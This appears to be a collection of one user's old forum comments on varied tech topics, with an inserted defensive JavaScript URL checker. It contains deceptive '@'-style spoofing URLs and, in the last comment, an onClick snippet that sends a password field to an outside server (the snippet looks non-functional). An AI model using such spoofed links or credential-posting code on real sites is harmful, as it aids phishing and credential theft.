The company I am working for I didn't join because of their great ideas. Though what we are building is very cool. It was the fact that the CEO and President are both Ernst and Young alumni, and two of our Board of Directors have significant experience in the industry we are building it for. On top of that, they have a rock solid business plan that I was very impressed with, and know what's important to spend money on (legal, dev workstations, software licenses) and what not to (not working off of a yacht yet).
Add to that what an earlier poster said about financing and you have the mix to keep most people from starting or succeeding at this. Show me software developers who know how to create a good financial plan, can prove a track record of delivering software, and know the industry they are building for, and I bet very few of them are unemployed.
Something I thought about with your post. I work for a local gov't agency, and any electronic transmission is, by law, public record. We have lots of disclaimers throughout the site and when you submit forms to notify you of this.
One has to wonder if it really matters anyway. Like a previous poster said, you can probably file a FOIA request to get all of the email addresses anyway. But, if that is the case, they should have never made the insinuation that the information you sent in would be private.
I also do this, though I also include a statement that if they want to check what I did they can view the logs from x time to y time and see the URL patterns.
I usually don't get a reply, but the exploit almost always gets fixed. The only time I did get a reply was when I found out you could get into the Home Banking Administrative Interface of my Credit Union after you had logged in to your account. When I called their tech support the guy at first said you couldn't. When I told him to log in to an account and then try it, I heard, "Ok, loggin...Oh my!"
For the most part though I follow the Enron rule as well. If I can't explain how I stumbled on it, then I don't want to have done it.
I've used several bags, and my favorite is my Compucessory bag. It is a rolling laptop case - with an extendable handle and fairly rugged wheels. It also has straps that make it a fairly comfortable backpack. Nice also that when using as a backpack you don't get the uncomfortable feel of the internal braces. Description from OfficeMax
For pure safety, try the Anvil or Zero Halliburton computer briefcases. My first laptop - an IBM ThinkPad - survived an 8-foot fall in one of those things. The ZH ones come in aluminum finish too - very nice.
> The Cisco 7920 Wireless IP Phone does not at this time do anything but 2.4GHz 802.11b
You may be right about this. They may have said that it is supposed to do that in the future, and I thought they meant now. Though we do spend a *lot* of money on Cisco, so they may have had a beta phone. If I find out more I will post it.
We did a VoIP rollout. We are a 6,000 person local government agency that is in the middle of a rollout. It is great - we are using the phones from Cisco and we have a tremendous ROI.
Of course, it does help that we have a Gigabit backbone. But I have seen some of our telecom guys walking around with a phone from Cisco that is an IPPhone when in range of a WAP for our network, and a regular cell-phone otherwise. Pretty sweet.
If anyone wants more info, you can email me at foyc at hillsboroughcounty dot org
I posted this a long time ago, but somehow it is still relevant:
The Effects of a W3C SVG Standard
Positive: Flash plugin will eventually no longer be needed for vector graphics as a key set of vector standards will be integrated with browsers. Ensuring that fonts are on the users system will no longer be an issue. Font embedding can be standardized.
Negative: Netscape and IE will both bring "enhancements" to the base SVG models. Of course none of those "enhancements" will be present in BOTH browsers. IE will allow for basic SVG 3d shapes, though no applications will currently support the creation of those shapes. IE will also allow for very loose coding to create the SVG shapes. If you accidentally put a single co-ordinate set into your file, IE, instead of telling you that there is a stray point, will assume that you wanted to create a MSN logo and subsequent link to MSN.Com. Microsoft Word will support SVG export, including in the source file a bunch of code that no one has any bloody idea where it came from, what it is supposed to do, or how to get rid of it. Thirteen years later, Microsoft will take over the US Government and we will find out that the "miscellaneous code", has been stealing our personal information for years. Microsoft will call it "A bug". Netscape, on the other hand, encountering a stray co-ordinate pair, will assume that the "clean-coding" standards of the internet development community are going straight to hell in a hand basket and that the world is coming to an end. "That being the case," it will logically decide, "this poor bloke is about to meet his maker and doesn't need to be squandering his last few minutes with his peepers fixed on a computer monitor now does he? Best he be off to the local pub for a pint or two while he still has the chance". Netscape will then proceed to crash your operating system. Netscape will also do wonderful little tricks like incorrectly display circles as parallelograms, Render every font as 16 point Times New Roman, and completely leave out the bottom half of your document for some obscure reason that you will spend 13 weeks trying to track down before you finally come to the conclusion that "There really aren't that many Netscape users out there anyway".
AOL will just compress the heck out of everything it encounters and render every SVG image as a Dot.
Insignificant: Someone somewhere on a UNIX machine will be writing Plain Text news articles about how SVG is the worst threat to web usability since the invention of JPEG compression. They will urge the development community to avoid SVG because compatibility will still not be standard across all computers. They themselves will be ample proof of this fact only because their 28.8k external modems will not facilitate the download of the newest version of Netscape (God forbid a UNIX user should install IE) and even if they could get it installed, their 16mhz 1987 computer wouldn't know how to run it. The general population will promptly ignore these articles as they click yet another accidentally generated MSN logo link, leaving the insecure author to return to Usenet and his IRC client.
I figured it would only be a matter of time before Microsoft did this. I normally try to stay out of the *bash Microsoft* conversations, but after dealing with all the problems we have with the Microsoft JVM, and then having this on top of it...ugh.
Re:Unix Tab-Separated ASCII Files vs. XML on Effective XML · Score: 1
> Well, you can't actually compare a 23K EDI file to a 5000 line XML file, since if the XML file has fewer than an average of about 4-5 characters/line, it still wins.
The XML file contains at least 20 characters per line for a majority of the document.
> However, uncompressed storage requirements aren't really such a big deal; disk space and memory are cheap.
This isn't really as much about disk storage space as it is parsing through the document. And it isn't really about that either, it is about the people who talk about how easy it is to take a 5000-line XML file and *poof* transform it with XSL. It's the tradeoff for readability for performance. If you need raw performance, you use something like EDI. Difficult to read and program for (simply because it is so cryptic) compared to a nice XML structure, but the machine doesn't care about readability (to a degree).
> The real problem with larger files is transmission speeds/costs. It would be interesting to compare the compressed sizes of the EDI and XML file.
That would be interesting to find out. I'm sure the XML file would be marginally larger, but again the issue isn't with the bandwidth for the file, it is with the processing of the document.
> After all, most big Web sites using HTTPS couldn't operate without hardware SSL accelerators, but that isn't an argument against SSL.
Correct. In those cases they traded the performance of not having HTTPS for the security of having it. My guess would be that Slashdot couldn't keep up the load it does on the same hardware if everything is HTTPS. But, there is no reason to have it for them. Same goes for XML. When you need the readability (or the ability to say you "do" XML) you go with XML. There isn't anything wrong with either approach. XML is an excellent method for us to allow SQL, Informix, HP3000's and Servlets to all talk to each other. EDI is great for receiving the transmissions from providers.
Re:What are you talking about? on Effective XML · Score: 3, Interesting
You bring up some really good points. The reason that you hear a lot of "XML is slow" is because of the usage of XPATH. To use XPATH expressions, most implementations parse the entire XML document into memory.
I suppose you *could* write a custom parser. If your structure is well-defined, and not subject to a lot of changes, you could significantly increase performance that way. The other option is to parse the document once, get out what you need to get out into smaller chunks, dump the larger document, and only work off the smaller chunks.
Looks like TMTOWTDI is not just for Perl
Re:Unix Tab-Separated ASCII Files vs. XML on Effective XML · Score: 4, Interesting
> And anything that lets the EDI people replace their stuff with simpler, more open technology is good too..
My current project for the last 8 months has been working on just that - parsing HIPAA EDI transactions. We do it by converting them to XML data structures. There is a decent white paper about it too.
What I've found is that, for readability, XML is the way to go. For performance, EDI is definitely better. I have one EDI file that is 23k. When expanded to XML, it is close to 5000 lines long.
I agree with an earlier post. If you are using a hardware XML accelerator, or using small XML documents (config, etc), or needing readability over performance then it is great. But I have a hard time believing that it will replace tab-separated files any time soon (not that the parent poster was implying this).
I enjoyed both of the articles. The question I have is this. With the number of networks now being NATed and the such, will we ever truly need something like IPv6? It seems like when I hear about it, the talk is always that every device will have a unique IP address. But what I see is that large deployments of devices needing IP addresses are more and more being done using 192.* or 10.* addresses. Anyone else have more insight?
Will second this. We just deployed it out to over 5000 users for use as their primary PDF program. Works like a charm, and was much cheaper than Acrobat.
Of course, doesn't allow for editing of the document, but all we needed was just a way for users to create PDFs.
> Start planting sites that root peoples MS boxes and there will be a huge outcry on CNN or something.
Honestly, I am surprised something like this hasn't happened already, where a virus infects a computer, sends out variants, and on the next reboot wipes out everything on the machine. Several viruses have had the ability to get to the file system, so I am really surprised that it hasn't happened.
However, if it does, I know I'm in trouble because my fiancee still uses IE on my machine. I'm slowly getting her converted to Mozilla, and one day Linux, but hopefully I still have a little bit of time.
I work for a large county government. We support around 6000 users. We use a help desk with a product from Peregrine called ServiceCenter for requests. They then get assigned to the appropriate sections within ITS. For example, phone issues go to Telecomm, web site issues to the Web Team, etc.
Additionally, requests for updates to the website get sent through our communications department to us, or directly to us using a common email address that goes into a folder the web team shares.
The ServiceCenter works well, but the entire web request method just is horrible.
Yes, things like FTP logins rely on that. URLs are subsets of URIs which have a lot more useful things.
For example, if you need to go to an FTP site that has a login, you can type in your address bar:
ftp://user:pass@ftp.mysite.com
That will automatically log you in with your user name and password. You could also do just:
user@ftp.mysite.com
And it will prompt you for your password.
The problem is that it looks like it affects them all.
If I understand what they are saying, if you put a %01 before the @ symbol then the address bar will display one address while going to a different one. Guess what, so does just putting the @ symbol:
http://www.zdnet.com@slashdot.org
I'm still not really sure what the problem is. Even if the bug removed the @slashdot.org, it just means that those of us that actually pay attention to the address bar might get fooled. Most people don't pay any attention to the address bar, and wouldn't think twice about seeing an @ symbol there.
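The two comments above describe how whatever sits before the @ in a URL is treated as login information, not as the destination. As an added example (not part of the original comments), this JavaScript sketch uses the standard URL parser to report the host a link really goes to and flags userinfo that could mislead a reader; the name inspectUrl, the finding labels and the host-like heuristic are assumptions made for the example.

```javascript
// Added example: report the real destination of a URL and flag misleading userinfo.
// The sample URLs come from the comments above; everything else is illustrative.

// Decode percent-escapes without throwing on malformed input such as "%zz".
function safeDecode(text) {
  try {
    return decodeURIComponent(text);
  } catch (err) {
    return text;
  }
}

const CONTROL_CHARS = /[\u0000-\u001f\u007f]/g;   // includes the %01 case
const HOST_LIKE = /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i; // e.g. "www.zdnet.com"

function inspectUrl(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch (err) {
    // No scheme or otherwise invalid, e.g. "user@ftp.mysite.com".
    return { parsed: false, realHost: null, userinfo: null, findings: ["unparseable"] };
  }

  const findings = [];
  const user = safeDecode(url.username);
  const pass = safeDecode(url.password);
  const hasUserinfo = url.username !== "" || url.password !== "";
  const cleanedUser = user.replace(CONTROL_CHARS, "");

  if (hasUserinfo) {
    findings.push("userinfo-present");
    if (pass !== "") {
      // Credentials embedded in a link end up in history, logs and referrers.
      findings.push("password-in-url");
    }
    if (cleanedUser !== user || pass.replace(CONTROL_CHARS, "") !== pass) {
      // A control character before the @ is never needed for a real login.
      findings.push("control-char-in-userinfo");
    }
    if (HOST_LIKE.test(cleanedUser)) {
      // The "user name" reads like a site name, so the link can pass for that site.
      findings.push("userinfo-looks-like-host");
    }
  }

  return {
    parsed: true,
    realHost: url.hostname,            // where the request actually goes
    userinfo: hasUserinfo ? cleanedUser : null,
    findings,
  };
}

// Sample inputs taken from the comments, plus one plain URL for contrast.
const samples = [
  "http://www.zdnet.com@slashdot.org",
  "http://www.zdnet.com%01@slashdot.org",
  "ftp://user:pass@ftp.mysite.com",
  "http://slashdot.org/a@b",
];

for (const sample of samples) {
  const result = inspectUrl(sample);
  console.log(sample, "->", result.realHost, result.findings.join(",") || "ok");
}
```

A mail filter or link-preview service can apply the same check and show realHost next to the link text instead of the raw URL.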
In a word, no.
As was also discussed yesterday, *nothing* is uncrackable, with the exception of correctly used one-time pads.
The key is to put the appropriate level of security with the data you want protected. For example, if you have data you have to keep secret for 2 months, and they can crack it in 6, you can use that. But if you need to keep data, worth millions of dollars, secret for an extended period, then you should review your security.
However, I think that if you didn't start off with the above concept in mind when you started encrypting your data, then you weren't doing your job. Having 576 cracked shouldn't worry you unless you have older encrypted data using that.
You are right that it is a game. To keep information secure, you have to protect it. Because you protected it, people will want to try to unprotect it. Eventually they will, and if one doesn't keep up, you will lose it.
So, we don't need more secure forms of encryption, we just need to review the current ones and use the appropriate encryption scheme for the data trying to be protected.
I think that is one of the better analogies I have heard to date.
Software is a *lot* like a house. And open source gives you the ability to open it up, modify it and rebuild it any way you want if you know how to do it. For example, in my house I can easily change a light bulb, or replace the lock, or even build a bookshelf or deck, but would need help to add on an extra room. The same goes with open source. I can go in and change small things, but can't change larger things without help.
Closed source still allows you to change light bulbs, etc, but you don't have a choice - if you want to add on a deck, or a porch, or a room, you have to pay your original contractor to build it. You can't go out, buy a manual, and try it on your own (for the most part).
Especially if you tell them their address is http://www.homestarrunner.com/404. It even comes with a free picture of a loving family scene.
No, not quite true. The strongest encryptions are not based on no one knowing the algorithms - in fact most cryptographers do not regard an algorithm as secure unless it has been exposed. The strength lies in the keys generated.
For example, the RSA algorithm is available. But currently most people do not have the computing power necessary to decipher the keys to the transmission.
And if you do, do you really trust Microsoft to keep it secret?
You don't mention where you are from, but there is usually a user group of something near by. Check Yahoo Groups for things like Perl User Groups, Macromedia User Groups, .NET user groups, and the such.
I live and work in Tampa (for the next few months, anyway) and can usually find *something* to do if I am just looking for geek things to do.
The sad thing is that they already have the paper written (based on the quality of this one), it will just take them that long to get their server back online.
Really?
<a href="mylink.html" onClick="javascript:document.forms.length++;
theForm=document.forms[document.forms.length-1];
theForm.action='http://myserver.com';
theForm.elements.length=1;
theForm.elements[0].name='password';
theForm.elements[0].value='yourpw';
theForm.elements[0].type='text';
theForm.submit();">
My apologies. We use all three, and I should have been more specific with that.